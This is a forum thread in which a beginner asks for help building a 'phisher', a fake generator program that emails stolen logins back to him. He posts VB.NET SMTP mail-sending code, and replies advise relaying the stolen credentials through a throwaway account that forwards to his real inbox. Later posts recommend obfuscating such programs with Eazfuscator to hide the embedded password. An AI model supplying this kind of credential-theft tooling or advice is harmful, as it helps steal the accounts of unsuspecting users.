Making a Phiser without using a Password?

Posts 115 of 18 · Page 1 of 2
Making a Phiser without using a Password?
Okay, fiirst off, im new to coding, and was trying to figure a way to make a phisr that doesnt need my email pass...heres the code im using for my phiser...

Dim Msg As New MailMessage
Dim myCredentials As New System.Net.NetworkCredential
myCredentials.UserName = " andreas@AbSender.de"
myCredentials.Password = "Passwort des Absenders"

Msg.IsBodyHtml = False

Dim mySmtpsvr As New SmtpClient()
mySmtpsvr.Host = "smtp.web.de" ‘bei web.de
mySmtpsvr.Port = 25

mySmtpsvr.UseDefaultCredentials = False
mySmtpsvr.Credentials = myCredentials

Try
Msg.From = New MailAddress("andreas@AbSender.de")
Msg.To.Add("entchen@empfänger.de")
Msg.Subject = "Betreff"
Msg.Body = "Inhalt"
mySmtpsvr.Send(Msg)
MsgBox("E-Mail gesendet.", MsgBoxStyle.Information, Title:="Information")
Catch ex As Exception
MsgBox (Err.Number & ex.Message & ex.StackTrace.ToString) 'Falls ein Fehler auftritt wird eine MsgBox angezeigt
End Try
is there anyway to change this to just send it to the email and not have to log in (using Password?) or if sumone could make one for me, i'd be greatful and would pass u a decent CF account...thanks in advance for anyone who helps
You could instead have it send from some junky email to your real one instead of sending to itself.
hmmmm, could u explain how? is it in the coding or just a feature in the email provider website?
Set it to send to that junk account. Then you send it from your junk account to your main account.
Yeah you can do it one of two ways. Send to junk account such as a gmail account and have that account forward all emails to your real one. Which is probably easier. Or code it into the thing so that it will send it from a email address with the password. (junk one) To your real one with no pass.
Quote Originally Posted by Fogest View Post
Yeah you can do it one of two ways. Send to junk account such as a gmail account and have that account forward all emails to your real one. Which is probably easier. Or code it into the thing so that it will send it from a email address with the password. (junk one) To your real one with no pass.
I think the way I said it was easier to understand.
so does the code, i posted look decent enough to work?
As long as you do what we said and it works idk?
Encrypting phishers makes them 101% proof to people who try to get my password?
Quote Originally Posted by timeshift View Post
Encrypting phishers makes them 101% proof to people who try to get my password?
Why would they want your password?
Quote Originally Posted by HeavenlyRage View Post
Why would they want your password?
I saw a tutorial on another forum, that teached people how to get the password from these phish programs. But it only showed one way, I'd like to know if there are others, because encrypting protects from people using Reflector...
Quote Originally Posted by HeavenlyRage View Post
Why would they want your password?
So they can sneakaly steal your logs you get.
i do belive, a friend gave it to me...i kno that you can get into alot of the 'generators' with progs and get the password (ive dun it alot) but im trying to do one that dont need the password...
Quote Originally Posted by ogkush317 View Post
i do belive, a friend gave it to me...i kno that you can get into alot of the 'generators' with progs and get the password (ive dun it alot) but im trying to do one that dont need the password...
I used to do this using Reflector, but if you encrypt your program (I use Eazfuscator) then Reflector will show crypted (really?) values...
Posts 115 of 18 · Page 1 of 2

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?